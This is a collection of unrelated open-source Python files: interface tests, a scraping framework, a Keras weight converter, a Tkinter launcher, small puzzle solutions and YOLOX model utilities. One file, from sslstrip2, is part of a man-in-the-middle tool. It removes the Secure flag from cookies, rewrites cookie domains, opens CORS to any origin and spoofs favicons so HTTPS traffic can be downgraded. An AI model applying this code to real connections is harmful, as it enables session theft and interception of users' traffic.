def f(self, b): pass
implements(I)
# We no longer require names to match.
#self.assertRaises(BrokenMethodImplementation, verifyClass, I, C)
C.f=lambda self, a: None
verifyClass(I, C)
C.f=lambda self, **kw: None
self.assertRaises(BrokenMethodImplementation, verifyClass, I, C)
C.f=lambda self, a, *args: None
verifyClass(I, C)
C.f=lambda self, a, *args, **kw: None
verifyClass(I, C)
C.f=lambda self, *args: None
verifyClass(I, C)
def testExtraArgs(self):
class I(Interface):
def f(a): pass
class C(object):
def f(self, a, b): pass
implements(I)
self.assertRaises(BrokenMethodImplementation, verifyClass, I, C)
C.f=lambda self, a: None
verifyClass(I, C)
C.f=lambda self, a, b=None: None
verifyClass(I, C)
def testNoVar(self):
class I(Interface):
def f(a, *args): pass
class C(object):
def f(self, a): pass
implements(I)
self.assertRaises(BrokenMethodImplementation, verifyClass, I, C)
C.f=lambda self, a, *foo: None
verifyClass(I, C)
def testNoKW(self):
class I(Interface):
def f(a, **args): pass
class C(object):
def f(self, a): pass
implements(I)
self.assertRaises(BrokenMethodImplementation, verifyClass, I, C)
C.f=lambda self, a, **foo: None
verifyClass(I, C)
def testModule(self):
from zope.interface.tests.ifoo import IFoo
from zope.interface.tests import dummy
verifyObject(IFoo, dummy)
def testMethodForAttr(self):
class IFoo(Interface):
foo = Attribute("The foo Attribute")
class Foo:
implements(IFoo)
def foo(self):
pass
verifyClass(IFoo, Foo)
def testNonMethodForMethod(self):
class IBar(Interface):
def foo():
pass
class Bar:
implements(IBar)
foo = 1
self.assertRaises(BrokenMethodImplementation, verifyClass, IBar, Bar)
def test_suite():
loader=unittest.TestLoader()
return loader.loadTestsFromTestCase(Test)
if __name__=='__main__':
unittest.TextTestRunner().run(test_suite())
```
#### File: sslstrip2/sslstrip/SSLServerConnection.py
```python
import logging, re, string
from ServerConnection import ServerConnection
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
logging.debug("LEO Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.sustitucion
if dominio in real:
v=" Domain=%s"%real[dominio]
logging.debug("LEO New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
logging.debug("Found path-relative link in secure transmission: " + link)
logging.debug("New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
logging.debug("Found relative link in secure transmission: " + link)
logging.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
            absoluteLink = absoluteLink.replace('&amp;', '&')  # undo HTML entity escaping of ampersands
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceFavicon(self, data):
match = re.search(SSLServerConnection.iconExpression, data)
if (match != None):
data = re.sub(SSLServerConnection.iconExpression,
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
else:
data = re.sub(SSLServerConnection.headExpression,
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
if (self.urlMonitor.isFaviconSpoofing()):
data = self.replaceFavicon(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data
``` |
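The cookie handling described in the class docstring above comes down to the `cookieExpression` substitution in `handleHeader`, which drops the `Secure` attribute from `Set-Cookie` headers. A standalone sketch of just that step (the header value below is my own example, not taken from sslstrip2):
```python
import re

# Same pattern as SSLServerConnection.cookieExpression above.
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)

header_value = "sessionid=abc123; Path=/; Secure"      # hypothetical Set-Cookie value
stripped = cookieExpression.sub(r"\g<1>", header_value)
print(stripped)  # -> "sessionid=abc123; Path=/"
```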
{
"source": "84KaliPleXon3/transistor",
"score": 2
} |
#### File: books_to_scrape/persistence/newt_db.py
```python
import os
import newt.db
from examples.books_to_scrape.settings import DevConfig, ProdConfig, TestConfig
from transistor.utility.utils import get_debug_flag
def get_config():
    if 'appveyor' in os.environ.get('USERNAME', ''):
return TestConfig
return DevConfig if get_debug_flag() else ProdConfig
CONFIG = get_config()
ndb = newt.db.connection(CONFIG.NEWT_DB_URI)
```
#### File: examples/books_to_scrape/workgroup.py
```python
from transistor import BaseWorker
from examples.books_to_scrape.persistence import ndb
from transistor.persistence.newt_db.collections import SpiderList
from transistor.utility.logging import logger
class BooksWorker(BaseWorker):
"""
A Worker wraps the custom Spider object and processes it after returning
data from a scrape or crawl. The Worker can be combined into a Group of
an arbitrary number of Workers, to enable gevent based asynchronous I/O.
First, inherit from BaseWorker and then implement the pre_process_exports
and/or post_process_exports methods, as shown below. Other methods
that could be easily overriden include get_spider, get_spider_extractor, and
even process_exports could be overriden if needed.
Also, add any extra class attributes as needed here, to support your custom
Spider and Exporters.
"""
def pre_process_exports(self, spider, task):
"""
A hook point for customization before process_exports method is
called.
In this example, we use this method to save our spider data to
postgresql using newt.db.
        :param spider: the Scraper or Crawler object (e.g. MouseKeyScraper())
:param task: just passing through the task item for printing.
"""
if self.job_id != 'NONE':
try:
                # create the list with the job name if it doesn't already exist
ndb.root.spiders.add(self.job_id, SpiderList())
logger.info(f'Worker {self.name}-{self.number} created a new spider '
f'list for {self.job_id}')
except KeyError:
# will be raised if there is already a list with the same job_name
pass
# export the scraper data to the items object
items = self.load_items(spider)
# save the items object to newt.db
ndb.root.spiders[self.job_id].add(items)
ndb.commit()
logger.info(f'Worker {self.name}-{self.number} saved {items.__repr__()} to '
f'scrape_list "{self.job_id}" for task {task}.')
else:
# if job_id is NONE then we'll skip saving the objects
logger.info(f'Worker {self.name}-{self.number} said job_name is {self.job_id} '
f'so will not save it.')
def post_process_exports(self, spider, task):
"""
A hook point for customization after process_exports.
In this example, we append the returned scraper object to a
class attribute called `events`.
"""
self.events.append(spider)
logger.info(f'{self.name} has {spider.stock} inventory status.')
logger.info(f'pricing: {spider.price}')
logger.info(f'Worker {self.name}-{self.number} finished task {task}')
```
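As the docstring above suggests, `pre_process_exports` and `post_process_exports` are the whole customization surface of a worker. A minimal sketch of another subclass that only overrides `post_process_exports` (the class name `MinimalWorker` is hypothetical; it assumes the same `BaseWorker` attributes used above, i.e. `events`, `name` and `number`):
```python
from transistor import BaseWorker
from transistor.utility.logging import logger


class MinimalWorker(BaseWorker):
    """Smallest useful customization: keep each returned spider and log the task."""

    def post_process_exports(self, spider, task):
        # `events` is the same worker-level list used by BooksWorker above.
        self.events.append(spider)
        logger.info(f'Worker {self.name}-{self.number} finished task {task}')
```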
#### File: transistor/managers/base_manager.py
```python
import gevent
import json
from typing import List, Type, Union
from gevent.queue import Queue, Empty
from gevent.pool import Pool
from gevent.exceptions import LoopExit
from kombu import Connection
from kombu.mixins import ConsumerMixin
from transistor.schedulers.books.bookstate import StatefulBook
from transistor.schedulers.brokers.queues import ExchangeQueue
from transistor.workers.workgroup import WorkGroup
from transistor.exceptions import IncompatibleTasks
from transistor.utility.logging import logger
from kombu.utils.functional import reprcall
class BaseWorkGroupManager(ConsumerMixin):
"""
Base class for a WorkGroupManager.
"""
__attrs__ = [
'book', 'exporter', 'job_id', 'trackers', 'pool', 'qitems',
'workgroups',
]
def __init__(self, job_id, tasks: Type[Union[Type[StatefulBook],
Type[ExchangeQueue]]],
workgroups: List[WorkGroup], pool: int=20,
connection: Connection = None, should_stop=True, **kwargs):
"""
Create the instance.
:param job_id: will save the result of the workers Scrapes to `job_id` list.
If this job_id is "NONE" then it will pass on the save.
:param tasks: a StatefulBook or ExchangeQueue instance.
:param workgroups: a list of class: `WorkGroup()` objects.
:param pool: size of the greenlets pool. If you want to utilize all the
workers concurrently, it should be at least the total number
of all workers + 1 for the manager and +1 for the broker runner in
self.run() method. Otherwise, the pool is also useful to constrain
concurrency to help stay within Crawlera subscription limits.
:param connection: a kombu Connection object, should include the URI to
connect to either RabbitMQ or Redis.
:param should_stop: whether to run indefinitely or to stop after the
manager queue runs empty.
Example:
>>> groups = [
>>> WorkGroup(class_=MouseKeyGroup, workers=5, kwargs={"china":True}),
>>> WorkGroup(class_=MouseKeyGroup, workers=5, kwargs={})
>>> ]
:param pool: number of greenlets to create
"""
self.job_id = job_id
self.tasks = tasks
self.groups = workgroups
self.pool = Pool(pool)
self.qitems = {}
self.workgroups = {}
self.qtimeout = kwargs.get('qtimeout', 5)
self.mgr_qtimeout = self.qtimeout//2 if self.qtimeout else None
self.connection = connection
self.kombu = False
self.mgr_should_stop = should_stop
self.mgr_no_work = False
# call this last
self._init_tasks(kwargs)
def _init_tasks(self, kwargs):
"""
Create individual task queues for the workers.
If, Type[StatefulBook] is passed as the `tasks` parameter, the tracker with
a name that matches a workgroup name, is effectively the workgroup's
task queue. So, extract the tracker name from self.book.to_do()
and the tracker name should match the worker name.
Extract the tracker name and then create qitems:
Example hint, `self.tasks.to_do()` looks like this:
deque([<TaskTracker(name=mousekey.cn)>, <TaskTracker(name=mousekey.com)>])
"""
if isinstance(self.tasks, StatefulBook):
for tracker in self.tasks.to_do():
# set the name of qitems key to tracker.name
self.qitems[tracker.name] = Queue(items=tracker.to_do())
elif isinstance(self.tasks, ExchangeQueue):
for tracker in self.tasks.trackers:
self.qitems[tracker] = Queue()
self.kombu = True
else:
raise IncompatibleTasks('`task` parameter must be an instance of '
'StatefulBook or ExchangeQueue')
# if not a stateful book. The class should have some attribute which
# presents a list-like object, where this list-like object is a
# list of queues.
# classes of type Type[X], where X has attributes X.name and X.to_do(),
# where X.to_do() returns object appropriate for Queue(items=X.to_do())
self._init_workers(kwargs)
def _init_workers(self, kwargs):
"""
Create the WorkGroups by tracker name and assign them by name to the
workgroups dict.
:return:
"""
# first, build a list from tracker names per qitems.keys()
names = [name for name in self.qitems.keys()]
for name in names:
for group in self.groups:
# match the tracker name to the group name
if group.name == name:
# assumes `group` is a WorkGroup namedtuple
# add attrs to group.kwargs dict so they can be passed down
# to the group/worker/spider and assigned as attrs
group.kwargs['name'] = name
group.kwargs['url'] = group.url
group.kwargs['spider'] = group.spider
group.kwargs['worker'] = group.worker
group.kwargs['items'] = group.items
group.kwargs['loader'] = group.loader
# exporters is a list of exporter instances
group.kwargs['exporters'] = group.exporters
if not group.kwargs.get('qtimeout', None):
group.kwargs['qtimeout'] = self.qtimeout
basegroup = group.group(
staff=group.workers, job_id=self.job_id, **group.kwargs)
# now that attrs assigned, init the workers in the basegroup class
basegroup.init_workers()
# lastly, after calling init_workers, assign the workgroup
# instance to the workgroups dict with key = `name`
self.workgroups[name] = basegroup
def get_consumers(self, Consumer, channel):
"""
Must be implemented for Kombu ConsumerMixin
"""
return [Consumer(queues=self.tasks.task_queues,
accept=['json'],
callbacks=[self.process_task])]
def process_task(self, body, message):
"""
Process messages to extract the task keywords and then
load them into a gevent Queue for each tracker.
        To customize how this Manager class works with the broker,
this method should be a top consideration to override.
Kwargs is not currently used. But it could be very useful
to set logic flags for use in this method.
"""
keywords = body['keywords']
kwargs = body['kwargs']
logger.info(f'Got task: {reprcall(keywords)}')
try:
if isinstance(keywords, str):
keywords = json.loads(keywords)
for key in self.qitems.keys():
for item in keywords:
self.qitems[key].put(item)
if not self.mgr_should_stop:
if self.mgr_no_work:
gevent.spawn(self.manage).join()
except Exception as exc:
logger.error(f'task raised exception: {exc}')
message.ack()
def spawn_list(self):
""""
The spawn() method begins a new greenlet with the given arguments
(which are passed to the greenlet constructor) and adds it to the
collection of greenlets this group is monitoring.
We return a list of the newly started greenlets, used in a later
        `joinall` call.
:return: A list of the newly started greenlets.
"""
# here, workgroups is a list of Type[BaseGroup] objects
workgroups = [val for val in self.workgroups.values()]
spawn_list = [self.pool.spawn(self.monitor, worker) for work_group in
workgroups for worker in work_group]
# we get a blocking error if we spawn the manager first, so spawn it last
spawn_list.append(self.pool.spawn(self.manage))
return spawn_list
def monitor(self, target):
"""
        This method actually spawns the spider, and its purpose is to allow
        some additional final actions to be performed after the worker completes the
spider's job, but before it shuts down and the object instance is lost.
The simplest example which must be implemented:
def monitor(self, target):
'''
The only absolute requirement is to start the spider with
target.spawn_spider() and then call gevent.sleep(0)
'''
target.spawn_spider()
gevent.sleep(0)
A more useful example:
def monitor(self, target):
'''
More useful, would be to hook in some post-scrape logic between
spawn_spider() and gevent.sleep(0).
'''
target.spawn_spider()
# /start --> YOUR POST-SCRAPE HOOK IS HERE, ADD LOGIC AS REQUIRED.
for event in target.events:
                # .events is a simple list() kept as a class attribute on the scraper object
# we could apply some transformation to an object in event, now.
print(f'THIS IS A MONITOR EVENT - > {event}')
# /end --> YOUR POST SCRAPE HOOK LOGIC. Finally, call gevent.sleep()
gevent.sleep(0)
:param target: a worker
:return:
"""
target.spawn_spider()
gevent.sleep(0)
def manage(self):
""""
Manage will hand out work when the appropriate Worker is free.
The manager timeout must be less than worker timeout, or else, the
workers will be idled and shutdown.
"""
try:
while True:
for name, workgroup in self.workgroups.items():
for qname, q in self.qitems.items():
if name == qname: # workgroup name must match tracker name
# a tracker with the same name as workgroup name, is...
# ...effectively, the workgroup's task queue, so now...
# assign a task to a worker from the workgroup's task queue
for worker in workgroup:
one_task = q.get(timeout=self.mgr_qtimeout)
worker.tasks.put(one_task)
gevent.sleep(0)
except Empty:
self.mgr_no_work = True
if self.mgr_should_stop:
logger.info(f"Assigned all {name} work. I've been told I should stop.")
self.should_stop = True
else:
logger.info(f"Assigned all {name} work. Awaiting more tasks to assign.")
def main(self):
spawny = self.spawn_list()
if self.kombu:
gevent.spawn(self.run).join()
try:
            gevent.joinall(spawny)
except LoopExit:
logger.error('No tasks. This operation would block forever.')
# print([worker.get() for worker in spawny])
gevent.sleep(0)
``` |
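For orientation, `process_task` above expects JSON message bodies shaped like `{"keywords": ..., "kwargs": ...}`. A hedged producer sketch that would feed such a consumer — the exchange, queue and routing-key names are placeholders, since the real ones come from the `ExchangeQueue` instance passed in as `tasks`:
```python
import json
from kombu import Connection, Exchange, Queue

# Placeholder names; substitute whatever your ExchangeQueue declares.
task_exchange = Exchange('transistor', type='direct')
task_queue = Queue('books.toscrape.com', task_exchange, routing_key='books.toscrape.com')

with Connection('amqp://guest:guest@localhost//') as conn:
    producer = conn.Producer(serializer='json')
    producer.publish(
        # `keywords` may be a JSON-encoded string or a plain list; process_task handles both.
        {'keywords': json.dumps(['Black Dust', 'Soumission']), 'kwargs': {}},
        exchange=task_exchange,
        routing_key='books.toscrape.com',
        declare=[task_queue],
    )
```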
{
"source": "84moto/mamecog",
"score": 2
} |
#### File: 84moto/mamecog/mamecog_converter.py
```python
import sys
import numpy as np
import tensorflow as tf
from tensorflow import keras
# Load a trained model (h5 file) created with Keras, extract the kernels and
# biases of its Conv2D and Dense layers, and save them as binary files that
# the mamecog C# library can read.
def mamecog_convert(src_h5_fname):
model = keras.models.load_model(src_h5_fname)
model.summary()
layer_num = len(model.layers)
for layer_idx in range(layer_num):
print("\nLayer", layer_idx+1)
layer = model.layers[layer_idx]
print(layer.name)
if isinstance(layer, keras.layers.Conv2D):
print("Kernel shape")
print(layer.kernel.shape)
print("Bias shape")
print(layer.bias.shape)
            # Save the kernel to a binary file so that C# can read it as a
            # float array with the shape
            # [number of output planes, number of input planes, kernel height, kernel width]
fname_k = str(layer_idx+1) + "_" + layer.name + "_k.bin"
save_bin_k = layer.kernel.numpy().transpose(3,2,0,1)
save_bin_k.tofile(fname_k)
print("=> " + fname_k)
            # Save the bias to a binary file so that C# can read it as a
            # float array of size [number of output planes]
fname_b = str(layer_idx+1) + "_" + layer.name + "_b.bin"
save_bin_b = layer.bias.numpy()
save_bin_b.tofile(fname_b)
print("=> " + fname_b)
if isinstance(layer, keras.layers.Dense):
print("Kernel shape")
print(layer.kernel.shape)
print("Bias shape")
print(layer.bias.shape)
            # Save the kernel to a binary file so that C# can read it as a
            # float array of shape [number of output cells, number of input cells]
fname_k = str(layer_idx+1) + "_" + layer.name + "_k.bin"
save_bin_k = layer.kernel.numpy().transpose(1,0)
save_bin_k.tofile(fname_k)
print("=> " + fname_k)
            # Save the bias to a binary file so that C# can read it as a
            # float array of size [number of output planes]
fname_b = str(layer_idx+1) + "_" + layer.name + "_b.bin"
save_bin_b = layer.bias.numpy()
save_bin_b.tofile(fname_b)
print("=> " + fname_b)
print("\nConvert done.")
if __name__ == "__main__":
args = sys.argv
if len(args) == 2:
mamecog_convert(args[1])
else:
print("Usage: mamecog_converter.py srcfilename")
#end
``` |
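To sanity-check the binary layout described in the comments above, a saved kernel can be reloaded with numpy. Everything below is hypothetical: the filename follows the `<index>_<layer name>_k.bin` pattern used by the converter, and the shape depends on the exported model:
```python
import numpy as np

# Hypothetical first layer "conv2d" with 32 output planes, 1 input plane and a 3x3 kernel.
out_planes, in_planes, kh, kw = 32, 1, 3, 3
kernel = np.fromfile("1_conv2d_k.bin", dtype=np.float32).reshape(out_planes, in_planes, kh, kw)
bias = np.fromfile("1_conv2d_b.bin", dtype=np.float32)   # length == out_planes
print(kernel.shape, bias.shape)
```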
{
"source": "84n4n4j03/pinit",
"score": 3
} |
#### File: pinit/menus/argumentmenu.py
```python
import tkinter as tk
from menus.basemenu import BaseMenu
import subprocess as sp
class ArgumentMenu(BaseMenu):
def __init__(self, argumentString, button):
BaseMenu.__init__(self, "specify arguments")
self.__argumentString = argumentString
self.__button = button
self.__argument_names = [argument.split(")")[0] for argument in argumentString.split("$(")
if ")" in argument]
self.__arguments = {}
#print("self.__argument_names", self.__argument_names)
def __paint_argument_row(self, lf, argument, row_number):
tk.Label(lf, text=argument).grid(row=row_number, column=0)
entry = tk.Entry(lf, width=50)
entry.grid(row=row_number, column=1)
self.__arguments[argument] = entry
def __paint_execute_button(self, lf, row_number):
btn = tk.Button(lf, text="execute (or hit Enter)", command=self.__execute)
btn.grid(row=row_number, column=0, columnspan=2)
def __paint(self):
lf = tk.LabelFrame(self._frame, text=self.__argumentString)
self._parent.bind('<Return>', self.__execute)
lf.pack(side="top")
row_number = 0
for argument in self.__argument_names:
self.__paint_argument_row(lf, argument, row_number)
row_number += 1
self.__paint_execute_button(lf, row_number)
def __execute(self, event=None):
argString = self.__argumentString
for argument, entry in self.__arguments.items():
argString = argString.replace("$("+argument+")", entry.get())
self.__button.execute(argString)
def open_as_window(self):
if self.is_opened():
return
self._open(True)
self.__paint()
def _on_mouse_entered(self, event):
pass # override action from basemenu
def _on_mouse_left(self, event):
pass # override action from basemenu
```
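The placeholder parsing in `__init__` above works by splitting the command string on `$(` and then trimming at the first `)`. A standalone illustration with a made-up command template:
```python
# Hypothetical command template with two placeholders.
argumentString = "cp $(src) $(dst)"
argument_names = [argument.split(")")[0] for argument in argumentString.split("$(")
                  if ")" in argument]
print(argument_names)  # -> ['src', 'dst']
```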
#### File: pinit/misc/storagemanager.py
```python
import menus.mainmenu
import menus.pinmenu
import buttons.configbutton
import buttons.savebutton
import buttons.actionbutton
import buttons.dirbutton
import buttons.menubutton
import json
class StorageManager(object):
FILENAME = None
def __init__(self, layout_file=None):
if layout_file:
StorageManager.FILENAME = layout_file
if not StorageManager.FILENAME:
raise StorageManagerException("no layout file specified")
def load(self):
try:
with open(StorageManager.FILENAME, "r") as f:
js = f.read()
except:
print("unable to load saved layout")
return None
d = json.loads(js)
if not "mainmenu.MainMenu" in d["type"]:
raise StorageManagerException("no MainMenu found in toplevel")
mainMenu = menus.mainmenu.MainMenu(d["name"], create_empty=True)
for button in d["buttons"]:
self.__add_button(mainMenu, button)
return mainMenu
def save(self, mainMenu):
print("store to: " + StorageManager.FILENAME)
s = json.dumps(mainMenu.get_storage_description(), sort_keys=True, indent=4)
with open(StorageManager.FILENAME, "w") as f:
f.write(s)
def __add_button(self, menu, button):
if "configbutton.ConfigButton" in button["type"]:
menu.add_button(buttons.configbutton.ConfigButton(menu, button["color"]))
elif "savebutton.SaveButton" in button["type"]:
menu.add_button(buttons.savebutton.SaveButton(menu, button["color"]))
elif "actionbutton.ActionButton" in button["type"]:
menu.add_button(buttons.actionbutton.ActionButton(button["name"],
button["cmd"], button["color"]))
elif "dirbutton.DirButton" in button["type"]:
menu.add_button(buttons.dirbutton.DirButton(button["name"],
button["directory"], button["color"]))
elif "menubutton.MenuButton" in button["type"]:
menu.add_button(buttons.menubutton.MenuButton(button["name"],
self.__create_submenu(button["submenu"]), button["color"]))
else:
raise StorageManagerException("unknown buttontype")
menu.get_buttons()[-1].add_description(button["description"])
def __create_submenu(self, submenu):
if not "pinmenu.PinMenu" in submenu["type"]:
raise StorageManagerException("no PinMenu found as submenu")
pinMenu = menus.pinmenu.PinMenu(submenu["name"], create_empty=True)
for button in submenu["buttons"]:
self.__add_button(pinMenu, button)
return pinMenu
class StorageManagerException(Exception):
def __init__(self, reason):
self.reason = reason
def __str__(self):
return "Error reason: " + self.reason
```
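Reading `load()` and `__add_button()` above, the layout file is a JSON document whose button `type` strings only need to contain the class names being checked for. A hypothetical layout, written here as the Python dict that `json.dumps` would serialize (all names, colors and commands are illustrative):
```python
example_layout = {
    "type": "menus.mainmenu.MainMenu",
    "name": "mainMenu",
    "buttons": [
        {"type": "buttons.configbutton.ConfigButton", "color": "grey", "description": ""},
        {"type": "buttons.savebutton.SaveButton", "color": "green", "description": ""},
        {"type": "buttons.actionbutton.ActionButton", "name": "editor",
         "cmd": "gedit $(file)", "color": "white", "description": "open a file"},
        {"type": "buttons.dirbutton.DirButton", "name": "home",
         "directory": "/home/user", "color": "yellow", "description": "open the home dir"},
        {"type": "buttons.menubutton.MenuButton", "name": "tools", "color": "blue",
         "description": "pinned tools",
         "submenu": {"type": "menus.pinmenu.PinMenu", "name": "tools", "buttons": []}},
    ],
}
```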
#### File: 84n4n4j03/pinit/pinit.py
```python
from menus.pinmenu import PinMenu
from buttons.basebutton import BaseButton
from buttons.actionbutton import ActionButton
from buttons.menubutton import MenuButton
from menus.mainmenu import MainMenu
from buttons.savebutton import SaveButton
import json
from misc.storagemanager import StorageManager
from misc.windowmgr_gtk import WindowMgr
import argparse
import os
class PinIt(object):
def __init__(self, layout_file):
self.__mainMenu = StorageManager(layout_file).load()
if not self.__mainMenu:
print("create new")
self.__mainMenu = MainMenu("mainMenu")
self.__mainMenu.open_as_window()
self.__windowMgr = WindowMgr()
os.environ["PINIT_ROOT_DIR"] = os.path.dirname(os.path.realpath(__file__))
os.environ["PINIT_LAYOUT_DIR"] = os.path.dirname(os.path.realpath(layout_file))
def run(self):
print("PinIt by <NAME>")
print("visit https://github.com/84n4n4j03/pinit")
self.__mainMenu.run()
def run():
description="""
Lightweight GUI to simply create buttons to fire
    commands, programs, web-pages, ...
Easily organize these buttons in submenus and
pin them wherever needed on the screen.
They're always on top.
"""
parser = argparse.ArgumentParser(description=description)
parser.add_argument('-l', '--layout', default='../layout.js',
help='specify a json layout file (default: ../layout.js)')
args = parser.parse_args()
pinIt = PinIt(args.layout)
pinIt.run()
if __name__ == "__main__":
run()
``` |
{
"source": "85151/hw1-hw10.py",
"score": 4
} |
#### File: 85151/hw1-hw10.py/hw10.py
```python
from typing import List

class Solution:
def thirdMax(self, nums: List[int]) -> int:
nums = set(nums)
        # remove the two largest values when there are at least 3 distinct numbers;
        # otherwise keep the set intact and fall back to its maximum below
        for _ in range((2, 0)[len(nums) < 3]): nums.remove(max(nums))
return max(nums)
```
#### File: 85151/hw1-hw10.py/hw1.py
```python
from typing import List

class Solution:
def arrayPairSum(self, nums: List[int]) -> int:
nums = sorted(nums)
return sum(nums[i] for i in range(0, len(nums), 2))
```
#### File: 85151/hw1-hw10.py/hw3.py
```python
class Solution:
def heightChecker(self, heights):
a = sorted(heights)
return sum([1 for i in range(len(heights)) if (a[i] != heights[i])])
```
#### File: 85151/hw1-hw10.py/hw9.py
```python
class Solution:
def isPowerOfTwo(self, n: int) -> bool:
import math
if n<=0:
return False
elif round(math.log(n,2),9)==float(int(math.log(n,2))):
return True
else:
return False
``` |
{
"source": "851624623/YOLOX",
"score": 2
} |
#### File: yolox/utils/model_utils.py
```python
import contextlib
from copy import deepcopy
from typing import Sequence
import torch
import torch.nn as nn
from thop import profile
__all__ = [
"fuse_conv_and_bn",
"fuse_model",
"get_model_info",
"replace_module",
"freeze_module",
"adjust_status",
]
def get_model_info(model: nn.Module, tsize: Sequence[int]) -> str:
'''
    FLOPS (all upper case): floating point operations per second, a measure of hardware speed.
    FLOPs (lower case s): floating point operations, a measure of algorithm/model complexity.
https://www.zhihu.com/question/65305385
'''
stride = 64
img = torch.zeros((1, 3, stride, stride), device=next(model.parameters()).device)
flops, params = profile(deepcopy(model), inputs=(img,), verbose=False)
params /= 1e6
flops /= 1e9
flops *= tsize[0] * tsize[1] / stride / stride * 2 # Gflops
info = "Params: {:.2f}M, Gflops: {:.2f}".format(params, flops)
return info
def fuse_conv_and_bn(conv: nn.Conv2d, bn: nn.BatchNorm2d) -> nn.Conv2d:
"""
Fuse convolution and batchnorm layers.
check more info on https://tehnokv.com/posts/fusing-batchnorm-and-conv/
Args:
conv (nn.Conv2d): convolution to fuse.
bn (nn.BatchNorm2d): batchnorm to fuse.
Returns:
nn.Conv2d: fused convolution behaves the same as the input conv and bn.
"""
fusedconv = (
nn.Conv2d(
conv.in_channels,
conv.out_channels,
kernel_size=conv.kernel_size,
stride=conv.stride,
padding=conv.padding,
groups=conv.groups,
bias=True,
)
.requires_grad_(False)
.to(conv.weight.device)
)
# prepare filters
w_conv = conv.weight.clone().view(conv.out_channels, -1)
w_bn = torch.diag(bn.weight.div(torch.sqrt(bn.eps + bn.running_var)))
fusedconv.weight.copy_(torch.mm(w_bn, w_conv).view(fusedconv.weight.shape))
# prepare spatial bias
b_conv = (
torch.zeros(conv.weight.size(0), device=conv.weight.device)
if conv.bias is None
else conv.bias
)
b_bn = bn.bias - bn.weight.mul(bn.running_mean).div(
torch.sqrt(bn.running_var + bn.eps)
)
fusedconv.bias.copy_(torch.mm(w_bn, b_conv.reshape(-1, 1)).reshape(-1) + b_bn)
return fusedconv
def fuse_model(model: nn.Module) -> nn.Module:
"""fuse conv and bn in model
Args:
model (nn.Module): model to fuse
Returns:
nn.Module: fused model
"""
from yolox.models.network_blocks import BaseConv
for m in model.modules():
if type(m) is BaseConv and hasattr(m, "bn"):
m.conv = fuse_conv_and_bn(m.conv, m.bn) # update conv
delattr(m, "bn") # remove batchnorm
m.forward = m.fuseforward # update forward
return model
def replace_module(module, replaced_module_type, new_module_type, replace_func=None) -> nn.Module:
"""
Replace given type in module to a new type. mostly used in deploy.
Args:
module (nn.Module): model to apply replace operation.
replaced_module_type (Type): module type to be replaced.
new_module_type (Type)
replace_func (function): python function to describe replace logic. Defalut value None.
Returns:
model (nn.Module): module that already been replaced.
"""
def default_replace_func(replaced_module_type, new_module_type):
return new_module_type()
if replace_func is None:
replace_func = default_replace_func
model = module
if isinstance(module, replaced_module_type):
model = replace_func(replaced_module_type, new_module_type)
    else: # recursively replace
for name, child in module.named_children():
new_child = replace_module(child, replaced_module_type, new_module_type)
if new_child is not child: # child is already replaced
                model.add_module(name, new_child) # same name, so the child is replaced by new_child in place
return model
def freeze_module(module: nn.Module, name=None) -> nn.Module:
"""freeze module inplace
Args:
module (nn.Module): module to freeze.
name (str, optional): name to freeze. If not given, freeze the whole module.
Note that fuzzy match is not supported. Defaults to None.
Examples:
freeze the backbone of model
>>> freeze_moudle(model.backbone)
or freeze the backbone of model by name
>>> freeze_moudle(model, name="backbone")
"""
for param_name, parameter in module.named_parameters():
if name is None or name in param_name:
parameter.requires_grad = False
    # ensure modules like BN and dropout are frozen
for module_name, sub_module in module.named_modules():
        # actually there is no need to call eval for every single sub_module
if name is None or name in module_name:
sub_module.eval()
return module
@contextlib.contextmanager
def adjust_status(module: nn.Module, training: bool = False) -> nn.Module:
"""Adjust module to training/eval mode temporarily.
Args:
module (nn.Module): module to adjust status.
training (bool): training mode to set. True for train mode, False fro eval mode.
Examples:
>>> with adjust_status(model, training=False):
... model(data)
"""
status = {}
def backup_status(module):
for m in module.modules():
# save prev status to dict
status[m] = m.training
m.training = training
def recover_status(module):
for m in module.modules():
# recover prev status from dict
m.training = status.pop(m)
